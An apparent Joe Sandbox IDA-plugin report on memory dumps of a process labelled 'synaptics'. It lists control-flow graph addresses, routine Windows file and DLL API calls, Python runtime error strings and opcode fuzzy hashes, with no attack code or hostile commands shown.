                                                                                                                                                                                                                                    control_flow_graph 660 6c9a2d20-6c9a2d4a 661 6c9a2d4c-6c9a2d54 660->661 662 6c9a2d8d-6c9a2d8f 660->662 663 6c9a2d59-6c9a2d71 661->663 664 6c9a2d92-6c9a2d9b 662->664 670 6c9a2df6-6c9a2dfa 663->670 671 6c9a2d77-6c9a2d85 663->671 664->664 665 6c9a2d9d-6c9a2da9 664->665 667 6c9a2dab-6c9a2daf 665->667 668 6c9a2db1-6c9a2db8 665->668 667->671 668->663 669 6c9a2dba-6c9a2dbe 668->669 669->671 672 6c9a2e00-6c9a2e0e 670->672 673 6c9a2d8b-6c9a2dc9 671->673 674 6c9a3139-6c9a313e 671->674 672->672 675 6c9a2e10-6c9a2e12 672->675 684 6c9a2dcc-6c9a2df5 673->684 677 6c9a3148-6c9a3152 674->677 678 6c9a2e41-6c9a2e4f 675->678 679 6c9a2e14-6c9a2e1c 675->679 678->684 687 6c9a2e55-6c9a2e73 FindFirstFileW 678->687 681 6c9a2e1e-6c9a2e21 679->681 682 6c9a2e32-6c9a2e39 679->682 681->682 686 6c9a2e23-6c9a2e26 681->686 682->678 686->682 688 6c9a2e28-6c9a2e31 686->688 687->677 691 6c9a2e79-6c9a2e97 687->691 688->682 694 6c9a2ed8-6c9a2edd 691->694 695 6c9a2e99-6c9a2ea2 691->695 696 6c9a2ee1-6c9a2eea 694->696 695->684 701 6c9a2ea8-6c9a2eaa 695->701 697 6c9a2ef0-6c9a2ef6 696->697 699 6c9a2ef8-6c9a2efb 697->699 700 6c9a2f16-6c9a2f18 697->700 702 6c9a2efd-6c9a2f05 699->702 703 6c9a2f12-6c9a2f14 699->703 704 6c9a2f1b-6c9a2f1d 700->704 705 6c9a2eb8-6c9a2ed3 701->705 706 6c9a2eac-6c9a2eb5 701->706 702->700 707 6c9a2f07-6c9a2f10 702->707 703->704 708 6c9a3018-6c9a3029 704->708 709 6c9a2f23-6c9a2f2c 704->709 705->684 706->705 707->697 707->703 713 6c9a312f 708->713 714 6c9a302f-6c9a304f FindNextFileW 708->714 712 6c9a2f30-6c9a2f36 709->712 715 6c9a2f38-6c9a2f3b 712->715 716 6c9a2f56-6c9a2f58 712->716 713->674 723 6c9a3056-6c9a306c 714->723 717 6c9a2f3d-6c9a2f45 715->717 718 6c9a2f52-6c9a2f54 715->718 720 6c9a2f5b-6c9a2f5d 716->720 717->716 721 6c9a2f47-6c9a2f50 717->721 718->720 720->708 722 6c9a2f63-6c9a2f6a 720->722 721->712 721->718 724 6c9a2f70-6c9a2f79 722->724 725 6c9a3072-6c9a3075 723->725 726 6c9a3104-6c9a310d 723->726 724->724 727 6c9a2f7b-6c9a2f97 724->727 728 6c9a30cb 725->728 729 6c9a3077-6c9a307b 725->729 726->728 736 6c9a310f-6c9a3112 726->736 734 6c9a2f99-6c9a2f9b 727->734 735 6c9a2fbf-6c9a2fc1 727->735 730 6c9a30cf-6c9a30db FindClose 728->730 729->696 730->684 733 6c9a30e1-6c9a30e3 730->733 733->684 739 6c9a30e9-6c9a30ec 733->739 737 6c9a30b8-6c9a30bb 734->737 740 6c9a2fa1-6c9a2fb1 734->740 735->737 738 6c9a2fc7-6c9a2fd1 735->738 741 6c9a3120-6c9a312d call 6c9a1d00 736->741 742 6c9a3114-6c9a311d 736->742 748 6c9a30c9 737->748 749 6c9a30bd-6c9a30c6 737->749 743 6c9a3080-6c9a30a6 738->743 744 6c9a2fd7-6c9a2fe6 738->744 746 6c9a30fa-6c9a30fc 739->746 747 6c9a30ee-6c9a30f7 739->747 740->735 757 6c9a2fb3-6c9a2fbc 740->757 741->730 742->741 760 6c9a30a8-6c9a30aa 743->760 758 6c9a2fe8-6c9a2feb 744->758 759 6c9a2fed-6c9a2ff4 744->759 746->726 747->746 748->728 749->748 757->735 762 6c9a2ff7-6c9a2ffe 758->762 759->762 760->737 763 6c9a30ac-6c9a30b5 760->763 762->760 764 6c9a3004-6c9a3006 762->764 763->737 765 6c9a3008-6c9a3011 764->765 766 6c9a3014 764->766 765->766 766->708
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 6C9A2E65
                                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(00000000,?), ref: 6C9A3049
                                                                                                                                                                                                                                    • FindClose.KERNELBASE(?), ref: 6C9A30D3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C99D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C99D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c99d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3541575487-0
                                                                                                                                                                                                                                    • Opcode ID: 9480800e423828482954ed5089239aeebbc107e7f93454bfbbe6c70ecaaf1a00
                                                                                                                                                                                                                                    • Instruction ID: 8d79e171fa848617d7743ecea4628183f06b5d04851d3344e807ba6f66d173e4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9480800e423828482954ed5089239aeebbc107e7f93454bfbbe6c70ecaaf1a00
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AC15670604B029FC700DFAAC885A56B3F9FF59318F144628E969CBB91E731D946CBD1

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1709 6c9a8940-6c9a8964 1710 6c9a896b 1709->1710 1711 6c9a8966-6c9a8969 1709->1711 1712 6c9a896d-6c9a89a8 1710->1712 1711->1712 1713 6c9a89aa-6c9a89b0 1712->1713 1714 6c9a89b6-6c9a89d7 1712->1714 1713->1714 1715 6c9a89b2-6c9a89b4 1713->1715 1717 6c9a89dd-6c9a89ea call 6c9a14b0 1714->1717 1718 6c9a8bd0-6c9a8be3 1714->1718 1715->1714 1715->1717 1722 6c9a8b9e-6c9a8ba4 1717->1722 1723 6c9a89f0-6c9a8a00 1717->1723 1724 6c9a8ba6-6c9a8ba9 1722->1724 1725 6c9a8bb7-6c9a8bbd 1722->1725 1729 6c9a8a12-6c9a8a14 1723->1729 1730 6c9a8a02-6c9a8a0c 1723->1730 1724->1725 1726 6c9a8bab-6c9a8bb4 1724->1726 1725->1718 1728 6c9a8bbf-6c9a8bc2 1725->1728 1726->1725 1728->1718 1731 6c9a8bc4-6c9a8bcd 1728->1731 1734 6c9a8a58-6c9a8a82 1729->1734 1735 6c9a8a16-6c9a8a1b 1729->1735 1730->1729 1733 6c9a8b9c 1730->1733 1731->1718 1733->1722 1742 6c9a8a88-6c9a8a96 1734->1742 1743 6c9a8b81-6c9a8b8d 1734->1743 1736 6c9a8a1d-6c9a8a2d 1735->1736 1737 6c9a8a40-6c9a8a42 1735->1737 1747 6c9a8a3f 1736->1747 1748 6c9a8a2f-6c9a8a39 1736->1748 1737->1734 1739 6c9a8a44-6c9a8a52 call 6c9a1ab0 1737->1739 1739->1733 1739->1734 1751 6c9a8a9a-6c9a8aab 1742->1751 1743->1733 1745 6c9a8b8f-6c9a8b9a 1743->1745 1745->1722 1747->1737 1748->1733 1748->1747 1752 6c9a8ab1-6c9a8aca 1751->1752 1753 6c9a8be4-6c9a8c09 1751->1753 1759 6c9a8ad4-6c9a8af6 1752->1759 1756 6c9a8c0b-6c9a8c10 1753->1756 1757 6c9a8c16-6c9a8c37 1753->1757 1756->1757 1758 6c9a8c12-6c9a8c14 1756->1758 1760 6c9a8c3d-6c9a8c52 1757->1760 1763 6c9a8d20-6c9a8d28 1757->1763 1758->1757 1758->1760 1764 6c9a8af8-6c9a8b01 1759->1764 1765 6c9a8b59-6c9a8b68 1759->1765 1767 6c9a8c5b-6c9a8c7c 1760->1767 1768 6c9a8c54-6c9a8c57 1760->1768 1764->1765 1774 6c9a8b03-6c9a8b2c 1764->1774 1765->1745 1777 6c9a8b6a-6c9a8b6c 1765->1777 1778 6c9a8c7f-6c9a8c87 1767->1778 1771 6c9a8c59 1768->1771 1772 6c9a8c8d-6c9a8ca2 1768->1772 1771->1778 1775 6c9a8ca8-6c9a8cf8 1772->1775 1776 6c9a8d29-6c9a8d52 1772->1776 1784 6c9a8b4e-6c9a8b54 1774->1784 1785 6c9a8b2e-6c9a8b34 1774->1785 1807 6c9a8cfa-6c9a8d14 1775->1807 1808 6c9a8d15-6c9a8d1b 1775->1808 1786 6c9a8d58 1776->1786 1787 6c9a8e59-6c9a8e7b 1776->1787 1777->1743 1779 6c9a8b6e-6c9a8b7e 1777->1779 1778->1763 1778->1772 1779->1743 1784->1751 1785->1784 1789 6c9a8b36-6c9a8b43 1785->1789 1786->1787 1791 6c9a8d5e-6c9a8d76 1786->1791 1793 6c9a8e7e-6c9a8e86 1787->1793 1789->1765 1797 6c9a8b45-6c9a8b49 1789->1797 1798 6c9a8d78-6c9a8d7b 1791->1798 1799 6c9a8d7f-6c9a8da3 1791->1799 1797->1751 1801 6c9a8d7d 1798->1801 1802 6c9a8db4-6c9a8dcb 1798->1802 1804 6c9a8da5-6c9a8dae 1799->1804 1801->1804 1810 6c9a8dcd-6c9a8dd0 1802->1810 1811 6c9a8dd4-6c9a8de7 1802->1811 1804->1793 1804->1802 1808->1763 1812 6c9a8df9-6c9a8e0a 1810->1812 1813 6c9a8dd2 1810->1813 1815 6c9a8dea-6c9a8df3 1811->1815 1817 6c9a8e0c-6c9a8e58 1812->1817 1818 6c9a8e87-6c9a8ebf 1812->1818 1813->1815 1815->1793 1815->1812 1823 6c9a8ec8-6c9a8ee9 1818->1823 1824 6c9a8ec1-6c9a8ec4 1818->1824 1828 6c9a8eec-6c9a8ef5 1823->1828 1825 6c9a8ec6 1824->1825 1826 6c9a8ef7-6c9a8f03 1824->1826 1825->1828 1833 6c9a8f11-6c9a8f1e 1826->1833 1834 6c9a8f05-6c9a8f0f 1826->1834 1828->1826 1830 6c9a8f1f-6c9a8f25 1828->1830 1834->1830 1834->1833
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C99D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C99D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c99d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: path
                                                                                                                                                                                                                                    • API String ID: 0-190089999
                                                                                                                                                                                                                                    • Opcode ID: 043658662f71ce5711412e866e85eef2cb227006fdae052453b6b21792d786c9
                                                                                                                                                                                                                                    • Instruction ID: e00a4aafc41cb0aed158b479f1ea802601bedac6f3800f9cd6be72c6194568c4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 043658662f71ce5711412e866e85eef2cb227006fdae052453b6b21792d786c9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0AF158B1A042449FDB04DFA9DC41A5A77B9EF85328F14462AE91487FD0EB31E886C7C6
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNELBASE(?), ref: 6C9C24E2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9C2000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9c2000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InformationTimeZone
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 565725191-0
                                                                                                                                                                                                                                    • Opcode ID: 94d8a70473c344aad49b12487ac01126dcb71963c127a310d78ec0063b799fd9
                                                                                                                                                                                                                                    • Instruction ID: dfcd8a28e97d331a74a7a9e477950fedf3a706e0dd85f32a9d23c6ca31d1c2bf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94d8a70473c344aad49b12487ac01126dcb71963c127a310d78ec0063b799fd9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4241E171E015115BC7109AA5DD09AAB37BCAF05338F040324E969DBBD0EB38DD4987D3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a6a97ca5076fba04e4b0014bf5a125f97d8f03779d82f033b31ed7327eb65d9d
                                                                                                                                                                                                                                    • Instruction ID: 843228ec38a1cde7a7a5e47f4a860f6208c7e262124690de95d669288eb2935c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6a97ca5076fba04e4b0014bf5a125f97d8f03779d82f033b31ed7327eb65d9d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D427B75A053028FC704CF28C580A5AB7F1BF8D318F19866DE9699BB61D731E886DBC1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9D6000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9D6000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9d6000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 55db21b30ff68c1fdb8b53ee509a08d27af98afe7d8117effc4c063fcfa6b6bf
                                                                                                                                                                                                                                    • Instruction ID: 78587c3b4b3bc175d6d0908752c6ad3a7776cf2614f65ae421b1b59160577c2a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55db21b30ff68c1fdb8b53ee509a08d27af98afe7d8117effc4c063fcfa6b6bf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44E10971604B028BD304CF68DC40B4A77F8AF94328F168A2CE964E7B91E734F959C792
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • x, xrefs: 6C9DC1B9
                                                                                                                                                                                                                                    • mode U cannot be combined with 'x', 'w', 'a', or '+', xrefs: 6C9DC2DD
                                                                                                                                                                                                                                    • invalid buffering size, xrefs: 6C9DC63E
                                                                                                                                                                                                                                    • binary mode doesn't take an errors argument, xrefs: 6C9DC3F2
                                                                                                                                                                                                                                    • must have exactly one of create/read/write/append mode, xrefs: 6C9DC33C
                                                                                                                                                                                                                                    • can't have unbuffered text I/O, xrefs: 6C9DC62E
                                                                                                                                                                                                                                    • can't have text and binary mode at once, xrefs: 6C9DC28D
                                                                                                                                                                                                                                    • binary mode doesn't take an encoding argument, xrefs: 6C9DC39B
                                                                                                                                                                                                                                    • binary mode doesn't take a newline argument, xrefs: 6C9DC449
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9DC000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9DC000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9dc000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: binary mode doesn't take a newline argument$binary mode doesn't take an encoding argument$binary mode doesn't take an errors argument$can't have text and binary mode at once$can't have unbuffered text I/O$invalid buffering size$mode U cannot be combined with 'x', 'w', 'a', or '+'$must have exactly one of create/read/write/append mode$x
                                                                                                                                                                                                                                    • API String ID: 0-3421854384
                                                                                                                                                                                                                                    • Opcode ID: 92af66b7697651422062a702cef60c0997ae8f452f57f668f048c744a1beeb10
                                                                                                                                                                                                                                    • Instruction ID: f50caf3a289aa7889862a0927b4b9334007535277a708c21f50bac7333ce9d28
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92af66b7697651422062a702cef60c0997ae8f452f57f668f048c744a1beeb10
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16322371A087019FD7009F68CD41B5A77F8AF85328F168228F954ABB90E375FD45CB92

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 205 6c9a1d90-6c9a1dfc CreateFileW 206 6c9a200f-6c9a201b GetFileType 205->206 207 6c9a1e02-6c9a1e11 205->207 208 6c9a209b-6c9a209f 206->208 209 6c9a201d-6c9a2025 206->209 216 6c9a1fab-6c9a1fb0 207->216 217 6c9a1e17 207->217 211 6c9a215f 208->211 212 6c9a20a5-6c9a20b9 208->212 213 6c9a2027-6c9a202b 209->213 214 6c9a2035-6c9a205d 209->214 215 6c9a2165-6c9a2172 GetFileInformationByHandle 211->215 232 6c9a20bb-6c9a20c6 212->232 233 6c9a20f2-6c9a20fc 212->233 213->214 234 6c9a202d-6c9a2030 213->234 245 6c9a205f-6c9a2061 214->245 246 6c9a2071-6c9a2074 214->246 221 6c9a21ab 215->221 222 6c9a2174-6c9a2179 215->222 218 6c9a1fb2-6c9a1fb6 216->218 219 6c9a1f54-6c9a1f67 216->219 223 6c9a1f68-6c9a1f8e 217->223 224 6c9a1e1d-6c9a1e20 217->224 228 6c9a1fb8-6c9a1fee 218->228 229 6c9a1ff0-6c9a200e 218->229 227 6c9a21b1-6c9a21c7 221->227 252 6c9a217b-6c9a217e 222->252 253 6c9a2193-6c9a21a9 222->253 223->206 254 6c9a1f90-6c9a1faa 223->254 230 6c9a1e2b-6c9a1e2d 224->230 231 6c9a1e22-6c9a1e25 224->231 266 6c9a21c9-6c9a21d9 227->266 267 6c9a2222 227->267 228->206 228->229 241 6c9a1e30-6c9a1e39 230->241 231->219 231->230 264 6c9a20c8-6c9a20cb 232->264 265 6c9a20dc-6c9a20f0 232->265 233->211 238 6c9a20fe-6c9a2108 233->238 235 6c9a222a-6c9a2233 234->235 247 6c9a226d-6c9a227f 235->247 248 6c9a2235-6c9a2237 235->248 250 6c9a210a-6c9a2111 238->250 251 6c9a212c-6c9a2133 238->251 241->241 255 6c9a1e3b-6c9a1e3f 241->255 245->246 258 6c9a2063-6c9a206c 245->258 261 6c9a2076-6c9a207f 246->261 262 6c9a2084-6c9a2087 246->262 259 6c9a2239-6c9a223d 248->259 260 6c9a223f 248->260 250->211 268 6c9a2113-6c9a2127 250->268 251->211 269 6c9a2135-6c9a215e call 6c9a1d90 251->269 252->253 263 6c9a2180-6c9a2183 252->263 253->267 256 6c9a1e41-6c9a1e4b 255->256 257 6c9a1eb5-6c9a1ed1 255->257 270 6c9a1e4d-6c9a1e50 256->270 271 6c9a1e52-6c9a1e7d 256->271 293 6c9a1ee3-6c9a1ee6 257->293 294 6c9a1ed3-6c9a1ee0 257->294 272 6c9a2228 258->272 274 6c9a2241-6c9a224a CloseHandle 259->274 260->274 261->272 262->272 273 6c9a208d-6c9a2096 262->273 263->253 275 6c9a2185-6c9a218e 263->275 264->265 278 6c9a20cd-6c9a20d0 264->278 265->215 266->267 295 6c9a21db-6c9a21ee 266->295 267->272 268->235 270->257 270->271 304 6c9a1e99-6c9a1e9b 271->304 305 6c9a1e7f 271->305 272->235 273->272 282 6c9a224c-6c9a2261 274->282 283 6c9a2262-6c9a2264 274->283 275->235 278->265 285 6c9a20d2-6c9a20d7 278->285 283->247 292 6c9a2266 283->292 285->235 292->247 298 6c9a1ee8-6c9a1ef6 293->298 299 6c9a1f06-6c9a1f2c call 6c9a1d20 293->299 294->293 306 6c9a221d 295->306 307 6c9a21f0-6c9a21fd 295->307 313 6c9a1f48 298->313 314 6c9a1ef8-6c9a1eff 298->314 299->227 321 6c9a1f32-6c9a1f36 299->321 311 6c9a1ea9-6c9a1eb3 304->311 312 6c9a1e9d-6c9a1ea0 304->312 310 6c9a1e80-6c9a1e87 305->310 306->267 307->306 323 6c9a21ff-6c9a220c 307->323 317 6c9a1e89-6c9a1e8c 310->317 318 6c9a1e8e-6c9a1e97 310->318 311->298 312->257 319 6c9a1ea2-6c9a1ea7 312->319 313->219 314->219 314->299 314->313 317->304 317->318 318->304 318->310 319->257 319->311 321->313 324 6c9a1f38-6c9a1f42 321->324 323->306 326 6c9a220e-6c9a221b 323->326 324->227 324->313 326->267 326->306
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,00000080,00000000,00000000,00000003,02200000,00000000), ref: 6C9A1DEB
                                                                                                                                                                                                                                    • GetFileType.KERNELBASE(00000000,?,00000080,00000000,00000000,00000003,02200000,00000000), ref: 6C9A2010
                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 6C9A2242
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C99D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C99D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c99d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleType
                                                                                                                                                                                                                                    • String ID: I
                                                                                                                                                                                                                                    • API String ID: 691438592-3707901625
                                                                                                                                                                                                                                    • Opcode ID: a30e10d5bd66eb3eda1bf71858af614f56c5322439922d8d4df1452e4261d667
                                                                                                                                                                                                                                    • Instruction ID: 6fbf810952b122d2e216085b92e9ffc859aab2e50e0b3f866f8e06082511a7e5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a30e10d5bd66eb3eda1bf71858af614f56c5322439922d8d4df1452e4261d667
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29D12A31A016549BDF109BEADC4D7AD7778AF46328F200365ED2DA7AC0DB31D986CB81

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 328 6c85981d-6c85982e 330 6c859830-6c859836 328->330 331 6c85983f-6c859846 328->331 330->331 332 6c859838-6c85983a 330->332 333 6c859852-6c859866 dllmain_raw 331->333 334 6c859848-6c85984b 331->334 335 6c859918-6c859927 332->335 337 6c85986c-6c85987d dllmain_crt_dispatch 333->337 338 6c85990f-6c859916 333->338 334->333 336 6c85984d-6c859850 334->336 339 6c859883-6c859895 336->339 337->338 337->339 338->335 341 6c859897-6c859899 339->341 342 6c8598be-6c8598c0 339->342 341->342 343 6c85989b-6c8598b9 call 6c859741 dllmain_raw 341->343 344 6c8598c7-6c8598d8 dllmain_crt_dispatch 342->344 345 6c8598c2-6c8598c5 342->345 343->342 344->338 346 6c8598da-6c85990c dllmain_raw 344->346 345->338 345->344 346->338
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C859000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C859000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c859000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3136044242-0
                                                                                                                                                                                                                                    • Opcode ID: 75e8774744ee2f5029dfb801c8de389b346377d86e4d930433411264fc79a68f
                                                                                                                                                                                                                                    • Instruction ID: 68551eb6ca4dfa651df3b27da368641bbba14dca9caa7b82d956aab2899c9650
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75e8774744ee2f5029dfb801c8de389b346377d86e4d930433411264fc79a68f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D921F6F1D02129AFDB714E15CE409AE3A79EF85B98F514925F82457A10C3B08E238BD0

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 593 6c9ab810-6c9ab839 595 6c9ab92a-6c9ab932 593->595 596 6c9ab83f-6c9ab850 593->596 597 6c9ab963-6c9ab980 596->597 598 6c9ab856-6c9ab877 596->598 603 6c9abaaa-6c9abada 597->603 604 6c9ab986-6c9ab98d 597->604 605 6c9ab879-6c9ab887 598->605 606 6c9ab894-6c9ab89a 598->606 617 6c9abadc-6c9abadf 603->617 618 6c9abaed-6c9abaf5 603->618 604->603 607 6c9ab993-6c9ab996 604->607 605->606 614 6c9ab889-6c9ab892 AddDllDirectory 605->614 616 6c9ab89e-6c9ab8bb 606->616 607->603 609 6c9ab99c-6c9ab9a1 607->609 609->603 611 6c9ab9a7-6c9ab9ac 609->611 615 6c9ab9b0-6c9ab9b4 611->615 614->606 614->616 619 6c9ab9d0-6c9ab9d2 615->619 620 6c9ab9b6-6c9ab9b8 615->620 626 6c9ab8bd-6c9ab8df 616->626 627 6c9ab8e0-6c9ab8e2 616->627 617->618 623 6c9abae1-6c9abaea 617->623 622 6c9ab9d5-6c9ab9de 619->622 624 6c9ab9ba-6c9ab9c0 620->624 625 6c9ab9cc-6c9ab9ce 620->625 622->603 628 6c9ab9e4-6c9aba07 622->628 623->618 624->619 629 6c9ab9c2-6c9ab9ca 624->629 625->622 630 6c9ab933-6c9ab942 627->630 631 6c9ab8e4-6c9ab917 627->631 636 6c9aba0d-6c9aba2e 628->636 637 6c9abaf6-6c9abb00 628->637 629->615 629->625 630->595 639 6c9ab944-6c9ab962 630->639 631->595 643 6c9ab919-6c9ab91c 631->643 646 6c9aba4a-6c9aba50 636->646 647 6c9aba30-6c9aba3e 636->647 643->595 645 6c9ab91e-6c9ab927 643->645 645->595 651 6c9aba52-6c9aba71 646->651 647->646 652 6c9aba40-6c9aba48 647->652 655 6c9aba8b-6c9aba96 651->655 656 6c9aba73-6c9aba8a 651->656 652->646 652->651 655->618 659 6c9aba98-6c9abaa9 655->659
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • AddDllDirectory.KERNELBASE(?,?,?,?,6C9AB0B3), ref: 6C9AB88C
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C99D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C99D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c99d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Directory
                                                                                                                                                                                                                                    • String ID: DLL directory cookie$Provided cookie was not returned from os.add_dll_directory
                                                                                                                                                                                                                                    • API String ID: 3297363577-622246297
                                                                                                                                                                                                                                    • Opcode ID: b4f7fc915bf9c849143cf8aebe26976fd397acdc84cc9a44abd12c218025af39
                                                                                                                                                                                                                                    • Instruction ID: 7090d94935a388d79475303e9efe0f20795294b07d1fffad4d346d6765fdda32
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4f7fc915bf9c849143cf8aebe26976fd397acdc84cc9a44abd12c218025af39
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB812772B052085BDB048BA9EC51B6677BDEF8622CF148179ED188BB81FB21D846C7D1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • __mro_entries__ must return a tuple, xrefs: 6CAE43BE
                                                                                                                                                                                                                                    • __build_class__: not enough arguments, xrefs: 6CAE4468
                                                                                                                                                                                                                                    • __build_class__: func must be a function, xrefs: 6CAE44CE
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: __build_class__: func must be a function$__build_class__: not enough arguments$__mro_entries__ must return a tuple
                                                                                                                                                                                                                                    • API String ID: 0-1687680868
                                                                                                                                                                                                                                    • Opcode ID: 08226c0048005d02bc31cdfcda18933b9a5fbb49e6bdac17f200b5b61c32d605
                                                                                                                                                                                                                                    • Instruction ID: 6386be728bf107768257e77c96012c4b5505ba3d6b78ace55da719b43f790b64
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08226c0048005d02bc31cdfcda18933b9a5fbb49e6bdac17f200b5b61c32d605
